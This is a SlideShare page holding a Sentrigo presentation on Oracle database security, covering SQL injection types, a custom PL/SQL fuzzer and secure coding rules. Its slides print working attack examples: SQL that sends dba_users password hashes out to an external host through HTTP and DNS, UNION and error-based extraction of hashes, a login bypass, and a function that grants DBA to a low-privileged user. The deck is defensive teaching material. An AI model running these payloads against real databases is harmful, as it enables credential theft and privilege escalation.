SlideShare ist ein Scribd-Unternehmen logo

Hack your db before the hackers do

F
fangjiafu
1 von 33
Downloaden Sie, um offline zu lesen
Hack Your DB Before The Hackers Do! Todd DeSantis Lead SE, Sentrigo
What’s This Presentation All About?  Explore common DB vul. • SQL injection  Create your custom fuzzer • What is a fuzzer anyway? • PL/SQL – the right tool for the right job  Bombs away  Demo: Protecting your database in real- time
SQL Injection  Wikipedia – • is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
SQL Injection  Exists in any layer of any application • Web Applications • Stored program units  Build in  User created  Has many forms • Extra queries, unions, order by…  Easily avoided • Bind variables, strong typing
SQL Injection Types  In band – Use injection to return extra data • Part of normal result set (unions) • In error messages  Out of band – Use alternative route like UTL_HTTP, DNS to extract data  Blind / Inference – No data is returned but the hacker is able to infer the data using return codes, error codes, timing measurments and more
SQL Injection In-band SQL> select utl_inaddr.get_host_name('127.0.0.1') from dual; localhost SQL> select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual; select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual * ERROR at line 1: ORA-29257: host SYS=8A8F025737A9097A unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line 35 ORA-06512: at line 1
SQL Injection Out-of-band Send information via HTTP to an external site via HTTPURI select HTTPURITYPE( 'http://www.sentrigo.com/'|| (select password from dba_users where rownum=1) ).getclob() from dual; Send information via HTTP to an external site via utl_http select utl_http.request ('http://www.sentrigo.com/'|| (select password from dba_users where rownum=1)) from dual; Send information via DNS (max. 64 bytes) to an external site select utl_http.request ('http://www.'||(select password from dba_users where rownum=1)||'.sentrigo.com/' ) from dual; DNS-Request: www.8A8F025737A9097A.sentrigo.com
Blind SQL Injection Pseudo-Code: If the first character of the sys-hashkey is a 'A' then select count(*) from all_objects,all_objects else select count(*) from dual end if;
SQL Injection – Web Application  Username = ' or 1=1 -- The original statement looked like: 'select * from users where username = ''' + username + ''' and password = ''' + password + '''' The result = select * from users where username = '' or 1=1 --' and password = ''
SQL Injection – Demo Procedure CREATE OR REPLACE PROCEDURE LIST_TABLES(p_owner VARCHAR2) IS TYPE c_type IS REF CURSOR; l_cv c_type; l_buff VARCHAR2(100); BEGIN dbms_output.enable(100000); OPEN l_cv FOR 'SELECT object_name FROM all_objects WHERE owner = ''' || p_owner || ''' AND object_type = ''TABLE'''; LOOP FETCH l_cv INTO l_buff; dbms_output.put_line(l_buff); EXIT WHEN l_cv%NOTFOUND; END LOOP; CLOSE l_cv; END; /
SQL Injection – Inject SQL SQL> set serveroutput on SQL> exec list_tables('SCOTT') DEPT EMP BONUS SALGRADE SALGRADE SQL> exec list_tables('KUKU'' UNION SELECT username || '':'' || password FROM dba_users--') BI:FA1D2B85B70213F3 CTXSYS:71E687F036AD56E5 DBSNMP:0B813E8C027CA786 …
SQL Injection – Inject Functions CREATE OR REPLACE FUNCTION get_dba RETURN VARCHAR2 AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; RETURN 'Hacked'; END get_dba; /
SQL Injection – Inject Functions SQL> exec sys.list_tables('NOUSER'' || scott.get_dba()--') PL/SQL procedure successfully completed. SQL> @privs Roles for current user USERNAME GRANTED_ROLE ------------------------------ ------------ SCOTT CONNECT SCOTT DBA SCOTT RESOURCE
Fuzzing Fuzz testing or fuzzing is a software testing technique that provides random data ("fuzz") to the inputs of a program. If the program fails (for example, by crashing, or by failing built-in code assertions), the defects can be noted. The great advantage of fuzz testing is that the test design is extremely simple, and free of preconceptions about system behavior.
Finding Vulnerable Code  Finding dynamic query code select * from dba_dependencies where referenced_name = 'DBMS_SQL' select * from dba_source where upper(text) like '%IMMEDIATE%'  Finding sysdate select * from dba_source where upper(text) like '%||%SYSDATE%'
PL/SQL – The Right Tool  Easy to run SQL  Built-in the database  Cross platform  Good enough for the task  DBAs already speak it fluently  Can be easily scheduled as a DB job
Caution – Use With Care  Fuzzing on production is a big no-no  Be sure to receive permission from the DB owner
Design  Track – using tables • Track fuzzing results • Rerun, Restart tests after stoping and failing  Discovery • Code to find interesting stored program units  Invoke • Invocation code to invoke stored procedures with different edge-case parameters  Wrap • Tie it up in a loop and wrap in a package  Report • Report findings
Discovery – Find Relevant Objects
Discovery – Find Interesting Ones
Discovery – Find Interesting Ones
Discovery – Placing Data In Tables  Use dbms_describe for PL/SQL  Find 'Language Java' in code and then use dbms_describe on the PL/SQL wrapper  Save the data for future re-runs
Invoke Fuzzed Code  Use "execute immediate" to invoke anonymous PL/SQL blocks created from dbms_describe  Pass in various interesting input parameters • Strings containing ' or " • Long strings • Nulls • Combinations  On code using concatenation of numbers and dates directly without formating • NLS_DATE_FORMAT • NLS_NUMERIC_CHARACTERS
Invoking Fuzzed Code  Catch interesting errors • ORA-00921: unexpected end of SQL command • ORA-00936: missing expression • ORA-00933: SQL command not properly ended • Crashes – for C code • etc.
Example Interface
Example Interface
Example Interface
Bombs Away  Running as DBA on Oracle supplied code can be very interesting  Sentrigo Red Team discovered multiple vulnerabilities this way • Reported to Oracle • Protected by Hedgehog out of the box
Other Fuzzers Out There  Inguma PL/SQL fuzzer • Written by Joxean Koret • Python • http://inguma.sourceforge.net/  SPIKE • Not Oracle specific • Used to analyze and fuzz network protocols • http://www.immunityinc.com/resources- freesoftware.shtml
Write Secure Code  The least privilege principle • Lock down packages  System access, file access, network access  Use secure coding techniques • Bind variables • input validation • Clear ownership of security issues
Some Coding Rules  Avoid hardcoding username/password  Wrap sensitive/important program code – even if not really safe  Use full qualified names for function and procedure calls (e.g. SYS.DBMS_ASSERT)  Always validate user/database input  Be careful with dynamic statements (Cursors, SQL- Statements, …)  Be careful with file access  Be careful with OS command execution
Protecting Your Database  Try out the Hedgehog - http://www.sentrigo.com • Virtual patching • SQL Injection protection • Fine grain auditing • Centralized management • More…
Questions?

Empfohlen

Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 

Empfohlen

Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!ralphmigcute
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterMichael Coates
 
Oracle PL/SQL exception handling
Oracle PL/SQL exception handlingOracle PL/SQL exception handling
Oracle PL/SQL exception handlingSmitha Padmanabhan
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
Web Application Security 101 - 14 Data Validation
Web Application Security 101 - 14 Data ValidationWeb Application Security 101 - 14 Data Validation
Web Application Security 101 - 14 Data ValidationWebsecurify
 
04 Handling Exceptions
04 Handling Exceptions04 Handling Exceptions
04 Handling Exceptionsrehaniltifat
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
C days2015
C days2015C days2015
C days2015Nuno Loureiro
 
PowerCLI in the Enterprise Breaking the Magicians Code original
PowerCLI in the Enterprise Breaking the Magicians Code originalPowerCLI in the Enterprise Breaking the Magicians Code original
PowerCLI in the Enterprise Breaking the Magicians Code originaljonathanmedd
 
Cursor injection
Cursor injectionCursor injection
Cursor injectionfangjiafu
 
Layer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dosLayer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dosfangjiafu
 

Weitere ähnliche Inhalte

Was ist angesagt?

Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!ralphmigcute
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterMichael Coates
 
Oracle PL/SQL exception handling
Oracle PL/SQL exception handlingOracle PL/SQL exception handling
Oracle PL/SQL exception handlingSmitha Padmanabhan
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
Web Application Security 101 - 14 Data Validation
Web Application Security 101 - 14 Data ValidationWeb Application Security 101 - 14 Data Validation
Web Application Security 101 - 14 Data ValidationWebsecurify
 
04 Handling Exceptions
04 Handling Exceptions04 Handling Exceptions
04 Handling Exceptionsrehaniltifat
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
PowerCLI in the Enterprise Breaking the Magicians Code original
PowerCLI in the Enterprise Breaking the Magicians Code originalPowerCLI in the Enterprise Breaking the Magicians Code original
PowerCLI in the Enterprise Breaking the Magicians Code originaljonathanmedd
 

Was ist angesagt? (20)

Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning Center
 
Oracle PL/SQL exception handling
Oracle PL/SQL exception handlingOracle PL/SQL exception handling
Oracle PL/SQL exception handling
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
Web Application Security 101 - 14 Data Validation
Web Application Security 101 - 14 Data ValidationWeb Application Security 101 - 14 Data Validation
Web Application Security 101 - 14 Data Validation
 
04 Handling Exceptions
04 Handling Exceptions04 Handling Exceptions
04 Handling Exceptions
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Sql injection
Sql injectionSql injection
Sql injection
 
C days2015
C days2015C days2015
C days2015
 
PowerCLI in the Enterprise Breaking the Magicians Code original
PowerCLI in the Enterprise Breaking the Magicians Code originalPowerCLI in the Enterprise Breaking the Magicians Code original
PowerCLI in the Enterprise Breaking the Magicians Code original
 

Andere mochten auch

Cursor injection
Cursor injectionCursor injection
Cursor injectionfangjiafu
 
Layer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dosLayer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dosfangjiafu
 
Beautiful Chrysanthemums
Beautiful ChrysanthemumsBeautiful Chrysanthemums
Beautiful ChrysanthemumsNikos
 
Winter in Greece.
Winter in Greece.Winter in Greece.
Winter in Greece.Nikos
 
Capturing the nanosecond
Capturing the nanosecondCapturing the nanosecond
Capturing the nanosecondNikos
 
Greek Cats. (Nikos)
Greek Cats. (Nikos)Greek Cats. (Nikos)
Greek Cats. (Nikos)Nikos
 

Andere mochten auch (6)

Cursor injection
Cursor injectionCursor injection
Cursor injection
 
Layer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dosLayer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dos
 
Beautiful Chrysanthemums
Beautiful ChrysanthemumsBeautiful Chrysanthemums
Beautiful Chrysanthemums
 
Winter in Greece.
Winter in Greece.Winter in Greece.
Winter in Greece.
 
Capturing the nanosecond
Capturing the nanosecondCapturing the nanosecond
Capturing the nanosecond
 
Greek Cats. (Nikos)
Greek Cats. (Nikos)Greek Cats. (Nikos)
Greek Cats. (Nikos)
 

Ähnlich wie Hack your db before the hackers do

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthowaspindia
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacksNitish Kumar
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacksKumar
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Professional SQL for Developers
Professional SQL for DevelopersProfessional SQL for Developers
Professional SQL for DevelopersPaul Irwin
 
Security of Oracle EBS - How I can Protect my System (UKOUG APPS 18 edition)
Security of Oracle EBS - How I can Protect my System (UKOUG APPS 18 edition)Security of Oracle EBS - How I can Protect my System (UKOUG APPS 18 edition)
Security of Oracle EBS - How I can Protect my System (UKOUG APPS 18 edition)Andrejs Prokopjevs
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)Sam Bowne
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 

Ähnlich wie Hack your db before the hackers do (20)

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
Google Dorks and SQL Injection
Google Dorks and SQL InjectionGoogle Dorks and SQL Injection
Google Dorks and SQL Injection
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharth
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Professional SQL for Developers
Professional SQL for DevelopersProfessional SQL for Developers
Professional SQL for Developers
 
Security of Oracle EBS - How I can Protect my System (UKOUG APPS 18 edition)
Security of Oracle EBS - How I can Protect my System (UKOUG APPS 18 edition)Security of Oracle EBS - How I can Protect my System (UKOUG APPS 18 edition)
Security of Oracle EBS - How I can Protect my System (UKOUG APPS 18 edition)
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
 
Rails Security
Rails SecurityRails Security
Rails Security
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 

Mehr von fangjiafu

Wce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityWce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityfangjiafu
 
Oracle forensics 101
Oracle forensics 101Oracle forensics 101
Oracle forensics 101fangjiafu
 
Understanding and selecting_dsp_final
Understanding and selecting_dsp_finalUnderstanding and selecting_dsp_final
Understanding and selecting_dsp_finalfangjiafu
 
Wce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engfangjiafu
 
Ddos analizi
Ddos analiziDdos analizi
Ddos analizifangjiafu
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assertfangjiafu
 
Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdbafangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nixfangjiafu
 
Layer 7 ddos
Layer 7 ddosLayer 7 ddos
Layer 7 ddosfangjiafu
 
Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02fangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nixfangjiafu
 
Proper passwordhashing
Proper passwordhashingProper passwordhashing
Proper passwordhashingfangjiafu
 
Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰fangjiafu
 
2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronizationfangjiafu
 

Mehr von fangjiafu (20)

Wce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityWce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurity
 
Oracle forensics 101
Oracle forensics 101Oracle forensics 101
Oracle forensics 101
 
Understanding and selecting_dsp_final
Understanding and selecting_dsp_finalUnderstanding and selecting_dsp_final
Understanding and selecting_dsp_final
 
Wce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_eng
 
Ddos analizi
Ddos analiziDdos analizi
Ddos analizi
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assert
 
Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdba
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Layer 7 ddos
Layer 7 ddosLayer 7 ddos
Layer 7 ddos
 
Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02
 
Crypto hlug
Crypto hlugCrypto hlug
Crypto hlug
 
Fp
FpFp
Fp
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Rr 7944
Rr 7944Rr 7944
Rr 7944
 
Proper passwordhashing
Proper passwordhashingProper passwordhashing
Proper passwordhashing
 
Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰
 
Oech03
Oech03Oech03
Oech03
 
2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization
 
Unit07
Unit07Unit07
Unit07
 
Unit05
Unit05Unit05
Unit05
 

Hack your db before the hackers do

  • 1. Hack Your DB Before The Hackers Do! Todd DeSantis Lead SE, Sentrigo
  • 2. What’s This Presentation All About?  Explore common DB vul. • SQL injection  Create your custom fuzzer • What is a fuzzer anyway? • PL/SQL – the right tool for the right job  Bombs away  Demo: Protecting your database in real- time
  • 3. SQL Injection  Wikipedia – • is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
  • 4. SQL Injection  Exists in any layer of any application • Web Applications • Stored program units  Build in  User created  Has many forms • Extra queries, unions, order by…  Easily avoided • Bind variables, strong typing
  • 5. SQL Injection Types  In band – Use injection to return extra data • Part of normal result set (unions) • In error messages  Out of band – Use alternative route like UTL_HTTP, DNS to extract data  Blind / Inference – No data is returned but the hacker is able to infer the data using return codes, error codes, timing measurments and more
  • 6. SQL Injection In-band SQL> select utl_inaddr.get_host_name('127.0.0.1') from dual; localhost SQL> select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual; select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual * ERROR at line 1: ORA-29257: host SYS=8A8F025737A9097A unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line 35 ORA-06512: at line 1
